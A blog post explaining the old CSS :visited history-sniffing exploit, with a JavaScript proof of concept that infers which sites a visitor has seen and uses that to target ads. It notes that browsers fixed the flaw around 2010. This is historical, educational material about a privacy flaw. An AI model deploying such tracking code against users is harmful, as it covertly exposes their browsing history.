Amblem
Furkan Baytekin

History Sniffing on Legacy CSS: How Browsers Used to Leak Your Past

Learn a classic web privacy exploit that exposed users' browsing histories

History Sniffing on Legacy CSS: How Browsers Used to Leak Your Past
91
3 minutes

In the early 2000s, a clever CSS trick gave websites the ability to peek into your browsing history. This method—called history sniffing was widely known before being mitigated by browser vendors around 2010. In this post, we’ll explore how it worked, demonstrate a proof-of-concept (PoC), and understand why it no longer works today.

What Is History Sniffing?

History sniffing is a technique that allowed a malicious website to determine which other websites you had previously visited. This was possible using CSS pseudo-selectors, particularly :visited, in combination with JavaScript to infer the visual differences between visited and unvisited links.

The Core Idea

By rendering a list of links (e.g., popular sites) on the page and checking the computed style of each link, a site could determine which links the user had previously clicked.

html
<style> a:visited { color: rgb(255, 0, 0); /* Red for visited */ } a { color: rgb(0, 0, 255); /* Blue for unvisited */ position: absolute; left: -9999px; /* Hide from view */ } </style>

Using JavaScript, the attacker could inspect the rendered color:

javascript
const color = getComputedStyle(link).color; if (color === "rgb(255, 0, 0)") { // The link was visited! }

Realistic Use Case: Targeted Ads

Let’s say an attacker wants to tailor ads based on your browsing history:

Here’s a theoretical (non-working due it’s fixed by browsers about 14 years ago) demo that shows how this logic might have looked:

javascript
const siteCategories = { "https://www.ultimate-guitar.com": "music", "https://www.bodybuilding.com": "fitness", "https://www.goal.com": "sports" }; const visitedCategories = new Set(); Object.entries(siteCategories).forEach(([url, category], i) => { const a = document.createElement("a"); a.href = url; a.textContent = "link" + i; a.id = "link" + i; a.style.display = "none"; document.body.appendChild(a); }); setTimeout(() => { Object.entries(siteCategories).forEach(([_, category], i) => { const el = document.getElementById("link" + i); const color = getComputedStyle(el).color; if (color === "rgb(255, 0, 0)") { visitedCategories.add(category); } }); recommendAdBasedOn(visitedCategories); }, 100); function recommendAdBasedOn(categories) { if (categories.has("music")) { showAd("🎸 Guitars & lessons tailored just for you!"); } else if (categories.has("fitness")) { showAd("💪 Protein deals for your gains!"); } else if (categories.has("sports")) { showAd("⚽ Official football jerseys now in stock!"); } else { showAd("🌐 Discover something new, every day."); } } function showAd(text) { const ad = document.createElement("div"); ad.textContent = text; ad.style = "position:fixed; bottom:10px; right:10px; background:#ffc; padding:10px; z-index: 9999;"; document.body.appendChild(ad); }

⚠️ Disclaimer: This is for educational purposes only. Modern browsers have fixed this vulnerability. So this code won’t work in modern browsers.

How Browsers Fixed It

Around 2010, major browsers including Firefox, Chrome, and Safari introduced changes:

Fun Fact

Firefox addressed it in Bug 147777 and WebKit (Safari/Chrome) in Bug 16760.

Conclusion

What was once a subtle CSS trick turned into a full-blown privacy issue—ultimately fixed by a joint effort across browsers. It serves as a historical lesson in how even the most innocuous web features can be abused.


Album of the day:

Suggested Blog Posts